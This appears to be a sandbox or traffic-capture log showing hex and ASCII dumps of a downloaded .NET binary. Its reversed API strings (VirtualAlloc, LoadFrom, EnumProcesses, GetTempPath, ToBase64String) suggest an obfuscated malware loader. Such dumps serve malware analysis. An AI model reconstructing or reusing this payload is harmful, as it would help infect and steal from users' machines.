                                                  2022-04-23 06:15:18 UTC1525INData Raw: 4e 5f 74 65 67 00 65 6d 61 4e 72 65 73 55 5f 74 65 67 00 6c 6f 63 6f 74 6f 72 50 79 74 69 72 75 63 65 53 5f 74 65 73 00 66 4f 78 65 64 6e 49 00 6e 69 4d 00 74 61 6d 72 6f 46 00 73 64 6e 6f 63 65 53 6c 61 74 6f 54 5f 74 65 67 00 64 65 73 70 61 6c 45 5f 74 65 67 00 77 65 4e 74 72 61 74 53 00 65 6d 61 4e 79 72 6f 74 63 65 72 69 44 74 65 47 00 65 74 65 6c 65 44 00 73 65 74 79 42 6c 6c 41 65 74 69 72 57 00 68 74 61 50 72 65 64 6c 6f 46 74 65 47 00 79 72 6f 74 63 65 72 69 44 65 74 61 65 72 43 00 68 74 61 50 70 6d 65 54 74 65 47 00 64 6e 65 70 70 41 00 67 6e 69 72 74 73 62 75 53 00 68 74 69 57 73 74 72 61 74 53 00 6d 69 72 54 00 6d 6f 72 46 64 61 6f 4c 00 67 6e 69 72 74 53 34 36 65 73 61 42 6f 54 00 74 6e 61 69 72 61 76 6e 49 72 65 70 70 55 6f 54 00 65 70 79 54
                                                  Data Ascii: N_tegemaNresU_teglocotorPytiruceS_tesfOxednIniMtamroFsdnoceSlatoT_tegdespalE_tegweNtratSemaNyrotceriDteGeteleDsetyBllAetirWhtaPredloFteGyrotceriDetaerChtaPpmeTteGdneppAgnirtsbuShtiWstratSmirTmorFdaoLgnirtS46esaBoTtnairavnIreppUoTepyT
                                                  2022-04-23 06:15:18 UTC1527INData Raw: 65 47 00 73 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 6d 75 6e 45 00 78 45 65 6d 61 4e 65 6c 69 46 65 6c 75 64 6f 4d 74 65 47 00 65 6c 64 6e 61 48 65 73 6f 6c 43 00 73 73 65 63 6f 72 50 6e 65 70 4f 00 73 65 73 73 65 63 6f 72 50 6d 75 6e 45 00 65 67 61 73 73 65 4d 64 6e 65 53 00 74 78 65 54 77 6f 64 6e 69 57 74 65 47 00 74 63 65 52 77 6f 64 6e 69 57 74 65 47 00 73 77 6f 64 6e 69 57 64 6c 69 68 43 6d 75 6e 45 00 64 49 73 73 65 63 6f 72 50 64 61 65 72 68 54 77 6f 64 6e 69 57 74 65 47 00 65 6d 61 4e 73 73 61 6c 43 74 65 47 00 63 6f 6c 6c 41 6c 61 75 74 72 69 56 00 6f 66 6e 49 6f 65 47 74 65 47 00 44 49 43 4c 74 6c 75 61 66 65 44 72 65 73 55 74 65 47 00 44 49 6f 65 47 72 65 73 55 74 65 47 00 61 00 6c 6f 64 71 67 6b 4d 00 02 80 80 e2 88 80 e2 8b 80 e2 8b 80 e2 06
                                                  Data Ascii: eGseludoMssecorPmunExEemaNeliFeludoMteGeldnaHesolCssecorPnepOsessecorPmunEegasseMdneStxeTwodniWteGtceRwodniWteGswodniWdlihCmunEdIssecorPdaerhTwodniWteGemaNssalCteGcollAlautriVofnIoeGteGDICLtluafeDresUteGDIoeGresUteGalodqgkM
                                                  2022-04-23 06:15:18 UTC1528INData Raw: 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 6b 72 6f 77 65 6d 61 72 46 74 65 67 72 61 54 00 65 74 75 62 69 72 74 74 41 72 65 74 6e 69 6f 50 6e 6f 69 74 63 6e 75 46 64 65 67 61 6e 61 6d 6e 55 00 74 6e 65 6d 6e 6f 72 69 76 6e 45 65 6d 69 74 6e 75 52 00 6c 61 68 73 72 61 4d 00 65 74 75 62 69 72 74 74 41 65 6c 62 69 73 69 56 6d 6f 43 00 73 65 63 69 76 72 65 53 70 6f 72 65 74 6e 49 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 6e 6f 69 74 6e 65 76 6e 6f 43 67 6e 69 6c 6c 61 43 00 73 72 65 70 6c 65 48 65 6d 69 74 6e 75 52 00 65 74 75 62 69 72 74 74 41 79 74 69 6c 69 62 69 74 61 70 6d 6f 43 65 6d 69 74 6e 75 52 00 65 6c 69 74 61 6c 6f 56 73 49 00 73 65 63 69 76 72 65 53 72 65 6c 69 70 6d 6f 43 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 65 74 75 62
                                                  Data Ascii: .metsySetubirttAkrowemarFtegraTetubirttAretnioPnoitcnuFdeganamnUtnemnorivnEemitnuRlahsraMetubirttAelbisiVmoCsecivreSporetnI.emitnuR.metsySnoitnevnoCgnillaCsrepleHemitnuRetubirttAytilibitapmoCemitnuRelitaloVsIsecivreSrelipmoC.emitnuR.metsySetub
                                                  2022-04-23 06:15:18 UTC1530INData Raw: 63 6f 72 50 00 6e 6f 69 74 63 65 6c 6c 6f 43 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 73 73 65 63 6f 72 50 00 65 74 75 62 69 72 74 74 41 65 64 6f 43 72 65 73 55 6e 6f 4e 72 65 67 67 75 62 65 44 00 65 74 75 62 69 72 74 74 41 6e 65 64 64 69 48 72 65 67 67 75 62 65 44 00 65 74 61 74 53 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 73 63 69 74 73 6f 6e 67 61 69 44 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 65 74 61 67 65 6c 65 44 00 65 6d 69 54 65 74 61 44 00 74 72 65 76 6e 6f 43 00 6c 65 64 6f 4d 74 6e 65 6e 6f 70 6d 6f 43 2e 6d 65 74 73 79 53 00 6e 6f 69 74 70 65 63 78 45 32 33 6e 69 57 00 64 65 7a 69 6c 61 69 63 65 70 53 2e 73 6e 6f 69 74 63 65
                                                  Data Ascii: corPnoitcelloCeludoMssecorPeludoMssecorPssecorPetubirttAedoCresUnoNreggubeDetubirttAneddiHreggubeDetatSelbasworBreggubeDscitsongaiD.metsySetubirttAelbasworBreggubeDetageleDemiTetaDtrevnoCledoMtnenopmoC.metsySnoitpecxE23niWdezilaicepS.snoitce
                                                  2022-04-23 06:15:18 UTC1531INData Raw: 31 00 2f 00 30 00 24 00 27 00 24 00 26 00 24 00 25 00 20 00 24 00 20 00 23 00 20 00 22 00 20 00 21 00 19 00 1f 00 19 00 1e 00 19 00 1d 00 19 00 1c 00 19 00 1b 00 19 00 1a 00 16 00 17 00 15 00 16 00 0e 00 0f 00 04 00 07 00 04 00 06 00 04 00 05 00 02 00 03 00 00 00 eb 00 00 00 02 00 05 08 04 00 00 00 ca 00 00 00 02 00 00 00 00 00 00 00 00 00 67 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 5b 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 49 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 3c 00 13 00 00 00 00 00 00 00 00 00 04 00 02 00 00 00 00 00 35 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 26 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 1d 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 01 00 00
                                                  Data Ascii: 1/0$'$&$% $ # " !g[I<5&
                                                  2022-04-23 06:15:18 UTC1532INData Raw: 08 2b 08 27 08 22 08 1e 00 1f 00 00 00 00 00 01 00 1d 00 00 00 00 00 01 00 07 00 00 00 63 00 01 00 06 00 00 00 0d 00 01 00 05 00 00 00 0c 00 01 02 10 00 c5 02 10 00 c1 01 e6 00 bf 01 e6 00 b7 01 e6 00 af 01 f0 00 a5 01 f0 00 a1 01 e6 00 9d 01 e3 00 99 05 fe 00 64 05 ee 00 1b 14 41 05 ee 00 1b 14 21 05 ee 00 1b 12 81 05 ee 00 1b 12 61 05 ee 00 1b 12 41 05 ee 00 1b 12 21 05 ee 00 1b 12 01 05 ee 00 1b 11 e1 05 ee 00 1b 11 c1 05 ee 00 1b 11 a1 05 ee 00 1b 11 81 05 ee 00 1b 11 61 05 ee 00 1b 11 41 05 ee 00 1b 11 21 05 ee 00 1b 11 01 05 ee 00 1b 10 e1 05 ee 00 1b 10 c1 05 ee 00 1b 10 a1 05 ee 00 1b 10 81 05 ee 00 1b 10 61 05 ee 00 1b 10 41 05 ee 00 1b 10 21 05 ee 00 1b 10 01 00 5c 00 23 0f c0 00 5c 00 23 0f a0 05 ee 00 1b 0f 81 00 5c 00 23 0f 80 05 ee 00 1b 0f
                                                  Data Ascii: +'"cdA!aA!aA!aA!\#\#\#
                                                  2022-04-23 06:15:18 UTC1534INData Raw: 98 00 54 04 5a 15 44 04 29 0d ad 12 50 02 81 08 45 15 38 04 41 0d a7 0d 88 04 29 01 76 12 50 04 59 0d a0 13 bc 04 59 09 3c 15 25 03 01 08 87 10 8c 00 54 00 28 0d 88 00 54 00 70 0c 20 00 09 0c f4 15 20 03 b9 00 23 0d 88 01 01 01 8f 15 0e 03 b9 0a 5c 11 8c 02 91 0c e5 14 fe 03 a1 02 e1 14 ec 02 69 00 28 0d 88 02 f9 0c c5 14 dc 01 49 09 42 14 d3 04 29 01 76 14 cb 04 29 01 76 14 bc 01 49 02 c8 0e 0d 00 f1 0c c9 14 b0 01 41 0c c5 14 a5 01 41 0c bf 14 93 01 41 0c a7 14 86 02 e1 0c a1 11 6b 04 29 01 76 10 83 02 59 01 76 12 50 01 11 0c 9b 14 76 01 11 0c 95 14 6e 01 11 02 e1 14 61 01 a1 07 a5 10 b0 00 f9 00 28 0d 88 00 f9 00 28 0d 88 02 e1 0c 8e 14 4c 02 d9 0c 75 13 b2 04 29 0c 70 14 44 04 29 04 a2 14 40 02 c1 00 a8 0d 88 04 99 0c 5e 14 39 04 29 0c 5a 14 28 04 91
                                                  Data Ascii: TZD)PE8A)vPYY<%T(Tp #\i(IB)v)vIAAAk)vYvPvna((Lu)pD)@^9)Z(
                                                  2022-04-23 06:15:18 UTC1535INData Raw: 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00
                                                  Data Ascii: pln)' ln)' ' n)' ' ' )' pln)'
                                                  2022-04-23 06:15:18 UTC1536INData Raw: 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c a1 00 0c 00 00 0c c9 00 0b 00 00 0c 77 00 0a 00 00 0c 49 00 09 00 00 0c 22 00 08 00 00 0c 9a 00 07 00 00 0c 70 00 06
                                                  Data Ascii: n)' ' ' n)' ' ' ' pln)' ln)' ' )' wI"p
                                                  2022-04-23 06:15:18 UTC1538INData Raw: 00 1c 0e 32 00 91 00 00 00 00 85 00 01 c9 00 1c 0e 2a 00 96 00 00 00 00 83 74 01 c8 05 e7 0c 20 00 91 00 00 00 00 83 58 01 c8 04 64 0c 20 00 93 00 00 00 00 83 50 01 c7 05 e0 0c 20 00 91 00 00 00 00 83 34 01 c7 05 da 0c 20 00 93 00 00 00 00 83 2c 01 c6 05 ce 0c 20 00 93 00 00 00 00 82 dc 01 c5 05 c7 0c 20 00 93 00 00 00 00 82 90 01 c5 00 1c 0c 20 00 93 00 00 00 00 82 10 01 c5 00 1c 0c 20 00 93 00 00 00 00 81 a0 01 c5 00 1c 0c 20 00 93 00 00 00 00 80 c8 01 c5 02 57 0c 20 00 93 00 00 00 00 7f f4 01 c4 02 5b 0c 20 00 93 00 00 00 00 7f 64 01 c4 00 28 0d 88 18 86 00 00 00 00 7f 44 01 c4 05 c2 0c 20 00 93 00 00 00 00 7f 04 01 c3 05 bb 0c 20 00 93 00 00 00 00 7e e8 01 c3 05 b5 0c 20 00 93 00 00 00 00 7e cc 01 c3 05 af 0c 20 00 93 00 00 00 00 7e 70 01 c3 00 28 0d
                                                  Data Ascii: 2*t Xd P 4 , W [ d(D ~ ~ ~p(
                                                  2022-04-23 06:15:18 UTC1539INData Raw: 38 01 36 04 b6 0c 20 00 83 00 00 00 00 74 18 01 35 00 a8 0c 29 00 83 00 00 00 00 73 f8 01 35 01 76 0c 29 00 83 00 00 00 00 73 d8 01 34 01 71 0c 20 00 83 00 00 00 00 73 b8 01 34 00 2c 0c 20 00 83 00 00 00 00 73 98 01 33 00 a8 0c 27 00 83 00 00 00 00 73 78 01 33 01 76 0c 27 00 83 00 00 00 00 73 58 01 32 00 a8 0c 20 00 83 00 00 00 00 73 38 01 32 01 76 0c 20 00 83 00 00 00 00 73 18 01 31 00 23 0c 20 00 83 00 00 00 00 72 f8 01 31 00 30 0c 20 00 83 00 00 00 00 72 d8 01 31 00 28 0d 88 18 86 00 00 00 00 72 b8 01 31 00 1c 0c 20 00 93 00 00 00 00 72 3c 01 31 00 1c 0c 20 00 93 00 00 00 00 71 44 01 31 02 57 0c 20 00 93 00 00 00 00 70 4c 01 31 00 1c 0c 20 00 93 00 00 00 00 6e d0 01 31 00 28 0d 9d 05 c6 00 00 00 00 00 00 01 31 00 34 0d 9d 05 c6 00 00 00 00 00 00 01 31
                                                  Data Ascii: 86 t5)s5v)s4q s4, s3'sx3v'sX2 s82v s1# r10 r1(r1 r<1 qD1W pL1 n1(141
                                                  2022-04-23 06:15:18 UTC1540INData Raw: 00 00 00 00 00 df 03 b1 0d d2 01 c6 00 03 00 00 00 00 00 dd 01 51 0d 88 18 86 00 03 00 00 00 00 00 dc 01 66 0d e5 01 c6 00 03 00 00 00 00 00 d8 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 d6 03 44 0d d2 01 c6 00 03 00 00 00 00 00 d4 01 51 0d 88 18 86 00 03 00 00 00 00 00 d2 03 a8 0d e5 01 c6 00 03 00 00 00 00 00 cb 03 98 0d d9 01 c6 00 03 00 00 00 00 00 c6 03 8d 0d d2 01 c6 00 03 00 00 00 00 00 c4 01 51 0d 88 18 86 00 03 00 00 00 00 00 c1 03 80 0d e5 01 c6 00 03 00 00 00 00 00 b5 03 69 0d d9 01 c6 00 03 00 00 00 00 00 ab 03 57 0d d2 01 c6 00 03 00 00 00 00 00 a9 01 51 0d 88 18 86 00 03 00 00 00 00 00 a8 01 66 0d e5 01 c6 00 03 00 00 00 00 00 a4 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 a2 03 44 0d d2 01 c6 00 03 00 00 00 00 00 a0 01 51 0d 88 18 86 00 03 00 00 00
                                                  Data Ascii: QfKDQQiWQfKDQ
                                                  2022-04-23 06:15:18 UTC1542INData Raw: 93 00 80 00 00 00 00 00 3b 01 a6 0c 20 20 93 00 80 00 00 00 00 00 37 01 9e 0c 20 20 93 00 80 00 00 00 00 00 32 01 93 0c 20 20 93 00 80 00 00 00 00 00 32 01 8f 0c 20 20 93 00 80 00 00 00 00 00 31 01 89 0c 20 20 93 00 80 00 00 00 00 00 30 01 71 0c 29 00 83 00 00 00 00 3c f4 00 30 00 2c 0c 29 00 83 00 00 00 00 3c d4 00 2f 01 7f 0c 20 00 83 00 00 00 00 3c b4 00 2f 01 7a 0c 20 00 83 00 00 00 00 3c 94 00 2e 00 a8 0c 20 00 83 00 00 00 00 3c 74 00 2e 01 76 0c 20 00 83 00 00 00 00 3c 54 00 2d 01 71 0c 27 00 83 00 00 00 00 3c 34 00 2d 00 2c 0c 27 00 83 00 00 00 00 3c 14 00 2c 01 71 0c 20 00 83 00 00 00 00 3b f4 00 2c 00 2c 0c 20 00 83 00 00 00 00 3b d4 00 2c 00 28 0d 88 18 86 00 00 00 00 3b b4 00 2b 01 66 0d e5 01 c6 00 03 00 00 00 00 00 28 01 5c 0d d9 01 c6 00 03
                                                  Data Ascii: ; 7 2 2 1 0q)<0,)</ </z <. <t.v <T-q'<4-,'<,q ;,, ;,(;+f(\
                                                  2022-04-23 06:15:18 UTC1543INData Raw: 00 9d 0c 29 00 01 00 9d 0c 27 00 01 01 11 0c 20 00 01 02 dc 0c 20 00 11 02 d7 0c 6e 80 56 02 d7 0c 29 80 56 02 d7 0c 27 80 56 02 d7 0c 20 80 56 00 20 0d bb 06 06 00 20 0c 22 00 01 00 9d 0c 9a 00 01 02 b4 0c 70 00 01 00 9d 0c 6c 00 06 00 9d 0c 6e 00 01 00 20 0c 29 00 01 02 af 0c 27 00 01 00 20 0c 20 00 01 02 aa 0c 27 00 01 00 9d 0c 20 00 21 00 9d 0c a1 00 01 00 9d 0c c9 00 06 00 89 0c 77 00 06 00 89 0c 49 00 06 00 89 0c 22 00 06 00 89 0c 9a 00 06 00 89 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 9d 0c 27 00 01 00 9d 0c 20 00 06 00 20 0c 29 00 01 00 20 0c 27 00 01 01 6d 0c 20 00 01 02 73 0c 20 00 33 00 89 0c 9a 00 06 00 9d 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 89 0c 27 00 06 02 69 0c 20 00 06 02 51 0c
                                                  Data Ascii: )' nV)V'V V "pln )' ' !wI"pln)' ) 'm s 3pln)'i Q
                                                  2022-04-23 06:15:18 UTC1544INData Raw: 9c 00 00 01 80 00 b6 00 6c 01 65 00 00 0c 9a 00 00 01 05 00 b2 00 6c 01 65 00 00 0c 70 00 00 01 05 00 ae 00 6c 01 65 00 00 0c 6e 00 00 01 05 00 aa 00 6c 01 65 00 00 0c 6c 00 00 01 05 00 a6 00 6c 01 65 00 00 0c 77 00 00 01 05 00 a2 00 6c 01 65 00 00 0c 29 00 00 01 05 00 9e 00 6c 01 65 00 00 0c 49 00 00 01 05 00 9a 00 6c 01 65 00 00 0c 27 00 00 01 05 00 96 00 6c 01 65 00 00 0c 22 00 00 01 05 00 92 00 6c 01 65 00 00 0c 20 00 00 01 05 00 91 00 62 01 79 00 00 0c 95 00 10 01 80 00 88 00 5e 00 30 00 00 0c 90 00 10 01 00 00 84 00 5e 01 79 00 00 0c 8b 00 10 01 80 00 82 00 5d 01 79 00 00 0c 86 00 10 01 80 00 82 00 58 00 cd 00 00 0c 81 00 00 01 00 00 81 00 58 01 79 00 00 0c 7c 00 10 01 80 00 80 00 58 01 79 00 00 0c 77 00 10 01 80 00 7f 00 58 00 00 00 00 0c 29 00 00
                                                  Data Ascii: leleplenlellewle)leIle'le"le by^0^y]yXXy|XywX)
                                                  2022-04-23 06:15:18 UTC1546INData Raw: 05 9e 00 06 05 33 05 94 00 06 05 33 05 86 00 06 05 33 05 7c 00 06 05 4d 05 71 00 0e 05 4d 05 63 00 0e 05 4d 05 3d 00 0e 05 33 05 24 00 06 00 35 05 18 00 06 00 35 05 0b 00 06 04 f6 04 ea 00 06 00 35 04 e7 00 06 00 35 04 dd 00 06 00 00 04 cf 00 d3 00 35 04 c3 00 06 00 35 04 be 00 06 00 26 04 b9 00 0a 00 26 04 af 00 0a 00 35 04 a8 00 06 03 d7 04 9e 00 0e 03 d7 04 93 00 06 03 d7 04 88 00 06 03 d7 04 75 00 0e 03 d7 04 64 00 0e 03 d7 04 4c 00 0e 03 d7 04 3e 00 0e 03 d7 04 36 00 0e 03 d7 04 19 00 06 03 d7 04 01 00 06 03 d7 03 ea 00 06 03 d7 03 bc 00 06 00 35 03 b3 00 06 00 35 03 aa 00 06 00 35 03 a2 00 06 03 8c 03 7d 00 0e 03 5e 03 4a 00 0e 03 14 03 33 00 06 03 14 03 27 00 06 03 14 03 08 00 06 02 b6 03 01 00 06 02 b6 02 ed 00 06 02 b6 02 df 00 06 02 b6 02 d1 00
                                                  Data Ascii: 333|MqMcM=3$555555&&5udL>6555}^J3'
                                                  2022-04-23 06:15:18 UTC1547INData Raw: 0c 87 9a ac c5 0f 1d 85 2a 5d 6d a9 93 55 f2 30 c8 15 29 db 13 07 85 2a 5d 71 68 2a 36 07 15 53 7b 6e 85 d8 cc 85 2a 52 80 95 6c db 40 a8 9f 70 fa d5 ad 6d dc 6f 93 0d 79 04 3f b1 4a 74 65 de af 18 13 60 5e af f1 e4 33 ca af 4d 52 bf f0 69 e6 80 ae ac 41 34 7d 85 2a 52 9a 33 d0 90 44 8e 85 2a 52 c1 bd 69 59 14 85 2a 52 ca 48 8f 83 df d2 d1 f9 65 32 85 86 c5 df 4d 59 76 bb 78 93 fb 9e 28 09 36 95 10 05 20 7b 85 2a 52 f6 8b 05 ff d3 c3 5d 33 11 51 59 c3 5c 15 ac b3 50 16 4a ce 01 0d 85 2a 52 17 eb cf e0 30 0e 97 98 c4 ea 98 b7 09 44 cc fb e2 88 3c f4 20 6a c0 1a c5 0a 85 2a 52 34 5a 6b 71 8e a2 dd 19 a2 df f4 7e bf 4c 39 bb 63 42 38 34 88 12 b0 4f e5 1d 21 e8 9f 90 00 b9 4c a6 85 2a 52 59 67 fb 12 2d bd 3b cb e1 85 2a 52 56 b4 fb f2 21 61 aa 59 9d aa 81 0b
                                                  Data Ascii: *]mU0)*]qh*6S{n*Rl@pmoy?Jte`^3MRiA4}*R3D*RiY*RHe2MYvx(6 {*R]3QY\PJ*R0D< j*R4Zkq~L9cB84O!L*RYg-;*RV!aY
                                                  2022-04-23 06:15:18 UTC1548INData Raw: 85 2a 57 a4 0e a6 4d b8 85 2a 57 c5 7a 63 3d 50 fe 8d 1d 90 49 ef 4c cc 41 ef 3f 85 2a 57 db 6b 8d 97 bd 29 83 f9 51 bb 51 85 2a 57 e2 e7 64 c1 b4 81 22 a4 ab a9 13 49 6e de 00 14 16 1d c2 10 15 c4 0d d3 f0 e0 04 6c e1 ee 5f 02 85 2a 57 14 f4 fb dc c6 90 b9 cd 42 da 58 ec 1b a8 a2 64 a5 15 2f ef f2 0f dc d0 60 2a 1d 80 85 2a 57 3f 57 66 f9 dc ba b7 f8 d6 dd 3e 39 85 2a 57 3e 65 32 50 91 fd 21 14 85 2a 57 45 a4 a9 cb 51 ee bc 61 85 2a 57 48 c9 cf 74 5b 70 c1 98 bf aa 3d 70 1e ef 31 85 2a 57 55 26 99 9a 4a 63 85 2a 57 65 a0 f9 dd ad 1f 0d 84 d0 2c 85 2a 57 72 e4 93 35 fd 4b 16 6a 59 11 b5 1a fd e1 a9 ec e8 b9 c6 11 38 a0 68 92 42 85 2a 54 85 f3 6d 6b 0f b3 49 4a 8b 8c e0 31 a9 bc 5c dc ba 57 69 20 8f 8c 00 df 7e 26 70 c7 7a 85 47 66 85 2a 54 af 57 d5 32 05
                                                  Data Ascii: *WM*Wzc=PILA?*Wk)QQ*Wd"Inl_*WBXd/`**W?Wf>9*W>e2P!*WEQa*WHt[p=p1*WU&Jc*We,*Wr5KjY8hB*TmkIJ1\Wi ~&pzGf*TW2
                                                  2022-04-23 06:15:18 UTC1549INData Raw: 98 98 38 dc 48 38 98 7c e8 dc 7c 98 0c 48 e8 0c 98 98 38 dc 48 a7 07 e3 77 43 e3 07 93 d7 77 93 07 07 a7 43 d7 a7 07 e3 77 43 e3 07 93 d7 77 93 07 07 a7 43 d7 1b bb 5f cb ff 5f bb 2f 6b cb 2f bb bb 1b ff 6b 1b bb 5f cb ff 5f bb 2f 6b cb 2f bb bb 1b ff 6b ad 0d e9 7d 49 e9 0d 99 dd 7d 99 0d 0d ad 49 dd ad 0d e9 7d 49 e9 0d 99 dd 7d 99 0d 0d ad 49 dd 15 b5 51 c5 f1 51 b5 21 65 c5 21 b5 b5 15 f1 65 15 b5 51 c5 f1 51 86 c1 65 c5 21 b9 b5 10 d1 65 66 c6 22 b6 82 22 c6 52 16 b6 52 c6 c6 66 82 16 66 c6 22 b6 82 22 c6 52 16 b6 52 c6 c6 26 a2 16 3c 46 5d c9 fd 5d b9 41 05 ad 03 dc dc 6b 92 0a 6a d4 5d a7 94 3c f4 41 05 8d 5f d6 fa 46 fd 69 ea 4a ae 3a 0e ae 4a de 9a 3a de 4a 4a ea 0e 9a ea 4f 8d fa 0e ae 4a de 9a 3a de 4a 4a ea 0e 9a 8c 2c c8 5c 68 c8 2c b8 fc 5c
                                                  Data Ascii: 8H8||H8HwCwCwCwC__/k/k__/k/k}I}I}I}IQQ!e!eQQe!ef""RRff""RR&<F]]Akj]<A_FiJ:J:JJOJ:JJ,\h,\
                                                  2022-04-23 06:15:18 UTC1551INData Raw: c3 ec 3b 72 8a a0 71 06 b6 7b 39 59 c2 fe 65 f9 4a fd 9d e1 c6 f5 e1 a1 37 52 b1 37 df 7f e2 65 b7 59 35 7c b0 39 a5 74 1e c6 07 80 23 41 d9 02 6f f9 2e 50 6f 0c 03 32 5d 8f d1 62 1f be 39 2a 50 53 2d 41 e0 35 81 9b cd 10 19 eb f9 0d 63 03 e0 07 6f 26 c8 c1 d6 e0 b6 70 3b 68 47 4a a7 eb 91 f8 f1 31 4f a1 ab 01 b7 25 d0 ec cb cb a7 b9 9b 91 b5 2d 80 96 5a 13 d8 1e 5d 6d 96 44 e8 5c 48 39 56 fb 91 26 5c 2b 46 2c 85 9c 59 a8 6c b6 68 22 79 fb 55 7c c8 44 b1 71 c7 47 15 3e 8e 98 f4 bd e1 b5 9c f9 51 a4 4a c9 f5 7a 8a 9f 78 99 be 19 fd bc e2 27 a6 ef 78 15 63 fd 50 b9 34 c5 e5 99 3c 2f 81 4a 26 9d 4b 3f 3d ca 7d fa e8 d0 4b 51 53 a6 5f 8b 70 51 8f 34 bd 3b d3 56 3f bd 76 78 d1 32 e3 14 aa ec 05 66 7a 89 7c aa 4a 79 73 e1 d1 f6 1e 62 30 a1 90 1e b8 d3 f2 6d 13
                                                  Data Ascii: ;rq{9YeJ7R7eY5|9t#Ao.Po2]b9*PS-A5co&p;hGJ1O%-Z]mD\H9V&\+F,Ylh"yU|DqG>QJzx'xcP4</J&K?=}KQS_pQ4;V?vx2fz|Jysb0m
                                                  2022-04-23 06:15:18 UTC1552INData Raw: e4 1f e8 29 11 a1 6d 07 61 77 cc 0d 29 80 6b 0e b6 e8 5b 48 5f a0 72 fd c9 36 9a a4 2a 96 57 85 c2 a2 79 a5 f1 6d 4a 40 6e 92 fd 98 1d 88 b3 cc b9 64 51 37 44 18 21 fa 64 d2 4d 2e 09 0b 05 97 2c f0 e7 ae 38 7a ff ed 3b f2 35 e2 c5 9f 11 fb 72 66 14 cc 4d 16 44 82 76 68 52 5e 23 f0 72 01 90 c3 60 24 36 cb c7 e2 27 41 58 3b 41 28 83 e0 47 b6 d7 46 a1 1d 72 c1 6d 4d 8d 0c df 95 03 78 63 cc 93 56 e1 b2 20 65 dd 50 42 58 3f 0d a2 89 b9 d0 fa 42 e2 64 50 98 94 9b a4 cd 8c f0 9a 49 05 f3 0a e8 3d 85 21 46 42 d5 da ae b3 8b ed 1c bf 13 63 99 1f b7 c4 2b 19 b4 b6 98 70 3d 44 34 76 68 00 b3 c0 11 9a 18 1c 72 b7 fc 71 58 da 68 49 ec 62 aa a9 72 2b 08 3b d1 5b 8f 91 5b 51 78 76 bf fb bc ee 77 1e 82 15 dd 9d 6e 5e 40 fc 40 c3 93 17 d6 c9 dd 7a 38 da 8f 6b 7f 11 be c1
                                                  Data Ascii: )maw)k[H_r6*WymJ@ndQ7D!dM.,8z;5rfMDvhR^#r`$6'AX;A(GFrmMxcV ePBX?BdPI=!FBc+p=D4vhrqXhIbr+;[[Qxvwn^@@z8k
